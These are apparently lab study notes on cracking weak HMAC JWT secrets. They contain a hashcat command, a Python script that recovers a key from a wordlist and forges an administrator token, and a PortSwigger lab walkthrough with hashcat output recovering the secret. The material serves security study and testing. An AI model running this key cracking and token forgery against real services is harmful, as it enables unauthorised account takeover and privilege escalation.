Brute-forcing Secret Keys

Wordlist of well-known/default JWT secrets: jwt.secrets.list.

We can brute-force the HMAC secret of a JWT with hashcat as follows (hash mode 16500 is the JWT type):

hashcat -a 0 -m 16500 <jwt> <wordlist>

Hashcat takes the signing input (the base64url-encoded header and payload joined by a dot), computes an HMAC over it with each wordlist entry as the secret, and compares the result with the token's original signature. A match means that secret is the server's key, and any token can then be forged with it. This only works for symmetric algorithms (HS256/HS384/HS512), where the verification key is the signing key.
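The same check done by hand, as an added example that is not part of the original notes: a token is constructed inline and signed with the weak secret `secret1`, then each candidate secret is tried exactly the way hashcat does it (HMAC-SHA256 over `header.payload`, compared against the original signature). The token, wordlist and helper names are assumptions made for the example.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url(data: bytes) -> str:
    """Base64url without padding, as used by JWS."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    """Inverse of b64url; re-adds the padding that JWS strips."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Build an HS256-signed JWT (also what you use to forge one once the key is known)."""
    signing_input = (
        b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def crack_hs256(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the wordlist entry that reproduces the token's signature, or None.

    The raw header/payload segments are reused as-is, so the check does not
    depend on how the issuer serialized its JSON.
    """
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        # Brute-forcing the secret only makes sense for symmetric HMAC algorithms.
        raise ValueError(f"unsupported alg: {header.get('alg')!r}")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    target = b64url_decode(sig_b64)
    for secret in candidates:
        candidate = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(candidate, target):
            return secret
    return None


# Constructed sample: a token in the shape the lab issues, signed with a weak key.
SAMPLE_HEADER = {"kid": "6fb2b3aa-e305-4e7e-9764-8e2c8b42a3d5", "alg": "HS256"}
SAMPLE_PAYLOAD = {"iss": "portswigger", "exp": 1718028026, "sub": "wiener"}
SAMPLE_TOKEN = sign_hs256(SAMPLE_HEADER, SAMPLE_PAYLOAD, b"secret1")

# Constructed stand-in for jwt.secrets.list (a few entries is enough to show the loop).
CANDIDATES = ["password", "changeme", "secret", "jwt_secret", "secret1", "admin"]


if __name__ == "__main__":
    found = crack_hs256(SAMPLE_TOKEN, CANDIDATES)
    print(f"recovered secret: {found}")
    if found:
        # With the key recovered, re-signing a modified payload yields a valid token.
        forged = sign_hs256(SAMPLE_HEADER, {**SAMPLE_PAYLOAD, "sub": "administrator"}, found.encode())
        print(f"forged token: {forged}")
```

To run this against a real wordlist, pass `(line.rstrip("\n") for line in open("jwt.secrets.list", encoding="utf-8", errors="surrogateescape"))` as `candidates`; hashcat is far faster, but the matching logic is identical.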

LAB: JWT Authentication Bypass via Weak Signing Key

Goal: Brute-force the website's secret key, access /admin, and delete carlos.

$ hashcat -a 0 -m 16500 eyJraWQiOiI2ZmIyYjNhYS1lMzA1LTRlN2UtOTc2NC04ZTJjOGI0MmEzZDUiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTcxODAyODAyNiwic3ViIjoid2llbmVyIn0.c6A-cb8_r6JqIuBvZSl09tPYr6F7Zhii8lJsF2QkFjQ jwt.secrets.list

<SNIP>
eyJ...<SNIP>...FjQ:secret1
<SNIP>

This can also be done with Burp's JWT Editor extension, which can re-sign the token with the recovered secret.
